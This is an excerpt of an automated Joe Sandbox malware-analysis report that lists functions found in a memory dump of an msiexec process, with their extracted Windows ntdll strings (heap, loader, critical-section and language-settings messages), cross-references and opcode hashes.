Critical section address, xrefs: 24415425, 244154BC, 24415534
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 244154CE
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 244154E2
8, xrefs: 244152E3
undeleted critical section in freed memory, xrefs: 2441542B
Critical section address., xrefs: 24415502

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 2008fb859d4b5452594f9e2ee7e5fd00906497852855638353a430f7e26ecbd3
Instruction ID: 219e1227a94c4c38e372baf55015d1f02933a9fcfe6dcf59011f51765f99549c
Opcode Fuzzy Hash: 2008fb859d4b5452594f9e2ee7e5fd00906497852855638353a430f7e26ecbd3
Instruction Fuzzy Hash: 7F817AB1A00258EFEF24CF95C890FAEBBB5BB48714F20455AF608B7284D775A941CF90

Function 2439D08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 2439D0FD
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2439D2C3
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2439D146
@, xrefs: 2439D313
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2439D262
Control Panel\Desktop\LanguageConfiguration, xrefs: 2439D196
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2439D0CF
H/<$, xrefs: 243FA843
@, xrefs: 2439D2AF

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/<$$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-2353583956
Opcode ID: df87e14b15d94a3aa49a74b56648bc94bf7af9042d01b25a7e038ca58c5de044
Instruction ID: 42de19d1cc5fd6ab0da135b2188a85873be70cfcbc9a68b7a4126baac73698cb
Opcode Fuzzy Hash: df87e14b15d94a3aa49a74b56648bc94bf7af9042d01b25a7e038ca58c5de044
Instruction Fuzzy Hash: E2A17A729083459FE711CF25C881B5BBBE8BF94715F00892EF6989A251D778E908CF93

Function 24439179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

\Sessions, xrefs: 24439488
%s\%u-%u-%u-%u, xrefs: 24439422
%s\%ld\%s, xrefs: 2443948D
\BaseNamedObjects, xrefs: 2443949E
BaseNamedObjects, xrefs: 24439477, 2443947C
AppContainerNamedObjects, xrefs: 2443946E, 244394D6
Global\Session\%ld%s, xrefs: 244394C5
\AppContainerNamedObjects, xrefs: 244394AB, 244394B9

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: dc0f2b6954d27d0065cb3bfb4568bc3b716e0d2e3383758dbb1e10561c0f19ed
Instruction ID: c4e238099da2815511becf5876f870e7796805287226c6b52a804c0fa0b2e25a
Opcode Fuzzy Hash: dc0f2b6954d27d0065cb3bfb4568bc3b716e0d2e3383758dbb1e10561c0f19ed
Instruction Fuzzy Hash: F6D108B280A311AFEB21CB50C840B6FBFE8AF98B54F10096DFE9497251D774CD448B92

Function 24450274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 244504D3
Just reallocated block at %p to %Ix bytes, xrefs: 244505F1
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 244506EA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 2445069F
HEAP: , xrefs: 244503A6, 244504B5, 244505DD, 24450682, 244506D9
HEAP[%wZ]: , xrefs: 24450399, 244504A8, 244505D0, 24450675, 244506CC
RtlReAllocateHeap, xrefs: 244502BF, 24450362
About to reallocate block at %p to %Ix bytes, xrefs: 244503BA

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 4137307c4008adc09621248e7aae592d034f6822b2e2feb0615900ed303fb48b
Instruction ID: e4f7dec18f0c2d6f596d4db4c687d6adab98237d5f8928e440858389de5dcf72
Opcode Fuzzy Hash: 4137307c4008adc09621248e7aae592d034f6822b2e2feb0615900ed303fb48b
Instruction Fuzzy Hash: 39D1CE39504685DFEF16CF68C490BA9BBF1FF6A700F448099E585AB762CB38A941CF10

Function 2439F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

((LONG)FreeEntry->Size > 1), xrefs: 243FE0B3
(!TrailingUCR), xrefs: 243FE3A9
(LONG)FreeEntry->Size > 1, xrefs: 243FE291
HEAP: , xrefs: 243FDF64, 243FE0A8, 243FE286, 243FE39E
HEAP[%wZ]: , xrefs: 243FDF57, 243FE09B, 243FE279, 243FE391
(UCRBlock != NULL), xrefs: 243FDF6F

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 4522a9bec3a5d7f82cc558873cf86a80bb32e5939d0e3b8ffee162bb9aa6cc00
Instruction ID: 426b5d76bba5e4727b35a39ca523ac58ed905f2a449bef6a84dc851f5bc51b6c
Opcode Fuzzy Hash: 4522a9bec3a5d7f82cc558873cf86a80bb32e5939d0e3b8ffee162bb9aa6cc00
Instruction Fuzzy Hash: 3242FE316087819FD705CF29C884B6ABBE5FF98704F1449ADE89ACB352DB34E941CB52

Function 243C51EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Disallowed, xrefs: 243C5352
Kernel-MUI-Language-SKU, xrefs: 243C542B
WindowsExcludedProcs, xrefs: 243C522A
H/<$, xrefs: 243C54F0, 243C54AF, 2440BC60, 243C53DD, 2440BBFC, 243C5304, 243C5307, 243C53E0, 243C54B2, 243C54F3, 2440BBFF, 2440BC63
Kernel-MUI-Number-Allowed, xrefs: 243C5247
Kernel-MUI-Language-Allowed, xrefs: 243C527B

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: H/<$$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-3732405941
Opcode ID: 916a9a2db97127e76ae883eeb34b64f98935f3cb3ab9e49a0c7f537d1ae0df32
Instruction ID: 6a688368849157046c2c5b474479c363be7999df21ce30d68fcfbedf2922c803
Opcode Fuzzy Hash: 916a9a2db97127e76ae883eeb34b64f98935f3cb3ab9e49a0c7f537d1ae0df32
Instruction Fuzzy Hash: A6F12A72D11629EFDB06CFA8C980EDEBBB9FF58650F11406AE505A7214E7749E01CBA0

Function 243BB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

LdrpPreprocessDllName, xrefs: 24408403, 244084D7
SxS, xrefs: 244083ED
minkernel\ntdll\ldrutil.c, xrefs: 2440840D, 244084E1
DLL %wZ was redirected to %wZ by %s, xrefs: 244083FC
API set, xrefs: 244083F4, 244083F9
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 244084D0

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 2982e3338218e05d8734e1a05b751078e0a681e4ae38e6996148177d90ba2ad6
Instruction ID: f8e5994c13457468aa3afe51f06af263a4ed31398f487bc0c1d2483afea11be0
Opcode Fuzzy Hash: 2982e3338218e05d8734e1a05b751078e0a681e4ae38e6996148177d90ba2ad6
Instruction Fuzzy Hash: 5EC13631B006159BEB198F64C891BBE7BA5BF45300F1481A9E986ABF85EF74CD44C391

Function 243D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

RtlGetAssemblyStorageRoot, xrefs: 24412160, 2441219A, 244121BA
SXS: %s() passed the empty activation context, xrefs: 24412165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 24412180
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 244121BF
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 24412178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2441219F

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 8bcac58d6e2dfd1947eb238f87e07133c528b1f92bc708cb0e37b0a469ffb0a7
Instruction ID: 4e7e20ca0a6dc83e1ca44cc4000ad473b5eed7bfe92f9cd506c61d62121060c8
Opcode Fuzzy Hash: 8bcac58d6e2dfd1947eb238f87e07133c528b1f92bc708cb0e37b0a469ffb0a7
Instruction Fuzzy Hash: FE31E737E00514BBEB21CA958C90F5ABB79FF55A91F050099FA08BF249D2309E01CAA1

Function 243DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 244181E5
LdrpInitializeProcess, xrefs: 243DC6C4
minkernel\ntdll\ldrredirect.c, xrefs: 24418181, 244181F5
minkernel\ntdll\ldrinit.c, xrefs: 243DC6C3
Loading import redirection DLL: '%wZ', xrefs: 24418170
LdrpInitializeImportRedirection, xrefs: 24418177, 244181EB

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 88fadf804da8be56af8a8586db6aaa05bc0ebc3d385ee169251d1085e008b4f8
Instruction ID: 5d9ac3efd8faae319b099137e92a255bda86e6c4619a9b72791aad15dc1f8bfd
Opcode Fuzzy Hash: 88fadf804da8be56af8a8586db6aaa05bc0ebc3d385ee169251d1085e008b4f8
Instruction Fuzzy Hash: 5D3124726447459FE310DF28CC95E1AB7E4EFA4B20F040558F988AB395EB30EC04CBA2

Function 243CF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 244102E7
RTL: Re-Waiting, xrefs: 2441031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 244102BD

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 24bba073dbd321bcee109f9ff246d10a4b1fd5fbbbedcb23a63b0584619747af
Instruction ID: 1b7b98271285fb732796e4f134e175da35be6964a084ac343d96300262ceaf9b
Opcode Fuzzy Hash: 24bba073dbd321bcee109f9ff246d10a4b1fd5fbbbedcb23a63b0584619747af
Instruction Fuzzy Hash: 97E19F306047419FEB11CF28C880B1ABBE0BF88764F104A5DF5AADB6E1DB75E945CB52

Function 243CD7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

Process 0x%p (%wZ) exiting, xrefs: 2440F2C7
LdrShutdownProcess, xrefs: 2440F2CE
$, xrefs: 243CD86D
minkernel\ntdll\ldrinit.c, xrefs: 2440F2D8
$, xrefs: 243CD900

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-1975516107
Opcode ID: 1ca764f73c1cb5c0d3a17bb78f71c04ab4944144c236dc843903c00ab1f92580
Instruction ID: a112ea5450980471034f4282b23b633608259bd8cbd364dfa48cde3580126d82
Opcode Fuzzy Hash: 1ca764f73c1cb5c0d3a17bb78f71c04ab4944144c236dc843903c00ab1f92580
Instruction Fuzzy Hash: BD51DE72A00345DFEB05CFA4C484B8EBBF1FF58314F248169E801AB685DB78AD45CB80

Function 244511A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON

Download Yara Rule

Strings

-9$`, xrefs: 24451270
This is located in the %s field of the heap header., xrefs: 244512D6
HEAP: , xrefs: 2445124A, 2445125D, 2445125F, 244512C4
HEAP[%wZ]: , xrefs: 2445123D, 244512B7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 24451261

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$ -9$`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-802467363
Opcode ID: f53816d233006b4a223912547e6cfc8df0cf6e7cfc62f7ace58489e01c6c80c4
Instruction ID: c0d99fd92294dd0d8e6bb6374c2e3cef522ee4e938c77b683e37c7c471e8b0fe
Opcode Fuzzy Hash: f53816d233006b4a223912547e6cfc8df0cf6e7cfc62f7ace58489e01c6c80c4
Instruction Fuzzy Hash: FA31B232A10510EFEF12CB98D8C0FA6B7E9FF29B64F104156F541EB365D634AD40CA65

Function 243976B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

Invalid heap signature for heap at %p, xrefs: 243FB02F
HEAP: , xrefs: 243FB023
, passed to %s, xrefs: 243FB040
HEAP[%wZ]: , xrefs: 243FB016
RtlReAllocateHeap, xrefs: 243FB03F

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlReAllocateHeap
API String ID: 0-941669491
Opcode ID: 07fb74a07143389401e4ae006d73a413fc516198c0233a06e377d6fe1c379221
Instruction ID: d2b5d57bf0fc189630acf224da8f1ef7bdf3c639100f75d7c4c32d57a4533734
Opcode Fuzzy Hash: 07fb74a07143389401e4ae006d73a413fc516198c0233a06e377d6fe1c379221
Instruction Fuzzy Hash: ED01F732125581EFE319D719D899FE27BE4EF52A70F25409EF5404BAA6CFB89C80C960

Function 243B1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

@, xrefs: 24405A53
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 2440588F
HEAP: , xrefs: 24405884
HEAP[%wZ]: , xrefs: 24405877

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: a4756faa5a93c2861b97f901303beb17c9df4eae40416b3f0ff6580d95ec31bf
Instruction ID: f9910d4737260c61cc3450a2f26f9c171211d1e3050ef3b8577c77e1b56dabf4
Opcode Fuzzy Hash: a4756faa5a93c2861b97f901303beb17c9df4eae40416b3f0ff6580d95ec31bf
Instruction Fuzzy Hash: 19924671A01628CFEB26CF18C850B99B7B5FF45390F1581EAE989AB391D7349E80CF51

Function 243D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 243D8422
minkernel\ntdll\ldrinit.c, xrefs: 243D8421
@, xrefs: 243D8591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 243D855E

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: e1f23b2abdf40bfb048ca89581035c1e9794336879edb5bb6fee59eaecd12699
Instruction ID: 52319dc89b329b39039e3f5c86fd92649a4477415b7471f35776de1ff8ac4ddc
Opcode Fuzzy Hash: e1f23b2abdf40bfb048ca89581035c1e9794336879edb5bb6fee59eaecd12699
Instruction Fuzzy Hash: 02917D72508345EFE722CB61CC90FABBBE8BF94754F40092EF69896151E674E9048B52

Function 243D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 243D28D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 244121D9, 244122B1
SXS: %s() passed the empty activation context, xrefs: 244121DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 244122B6

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: fbab72d57dd9e256e2dd41468255d708cd8ced833a7ba10e9dc627aac954a3c5
Instruction ID: 4e051c6fd829e2fe80e30b3d8fe676064db359cae22a02d4b23a9572315d63d7
Opcode Fuzzy Hash: fbab72d57dd9e256e2dd41468255d708cd8ced833a7ba10e9dc627aac954a3c5
Instruction Fuzzy Hash: B9A19D32A01229DBDB25CF64DC84B99B7B5BF58314F2105EAE948AB359D7309E81CF90

Function 243A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 24400FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 24401028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 244010AE
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2440106B

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 1588a7ede072d80b14185b32deb432f6d8fe9e97e38c214c01f60b1e4eefd38a
Instruction ID: 7eaa6565ccd0f3e0cba51ceae6ca13b900fee105251e3018e986fc6b7d77caeb
Opcode Fuzzy Hash: 1588a7ede072d80b14185b32deb432f6d8fe9e97e38c214c01f60b1e4eefd38a
Instruction Fuzzy Hash: E871D0B29043149FDB11CF14C884F877BA8EF65B64F404469F9898B28AD735D688CFD2

Function 2439F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

`, xrefs: 243FE428
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 243FE563
HEAP: , xrefs: 243FE54E
HEAP[%wZ]: , xrefs: 243FE3FE

Memory Dump Source

Source File: 0000000A.00000002.2211492794.0000000024370000.00000040.00001000.00020000.00000000.sdmp, Offset: 24370000, based on PE: true

Associated: 0000000A.00000002.2211492794.0000000024499000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002449D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2211492794.000000002450E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_24370000_msiexec.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: bb006a9c60d9ff98e3a2dd938402cd7a2b2dd3c4437be976396d8f2fba1d3691
